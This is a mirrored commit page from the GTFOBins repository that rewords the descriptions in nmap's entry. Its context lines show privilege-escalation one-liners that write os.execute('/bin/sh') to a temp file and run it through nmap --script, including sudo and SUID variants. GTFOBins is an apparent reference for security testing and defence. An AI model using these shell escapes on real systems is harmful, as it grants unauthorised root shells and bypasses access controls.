mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-25 19:54:14 +02:00
Fix nmap descriptions
This commit is contained in:
@@ -1,19 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- description: Echoing of input characters is disabled.
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
nmap --script=$TF
|
||||
sudo-enabled:
|
||||
- description: Echoing of input characters is disabled.
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh")' > $TF
|
||||
sudo nmap --script=$TF
|
||||
suid-enabled:
|
||||
- description: Echoing of input characters is disabled.
|
||||
- description: Input echo is disabled.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo 'os.execute("/bin/sh -p")' > $TF
|
||||
|
Reference in New Issue
Block a user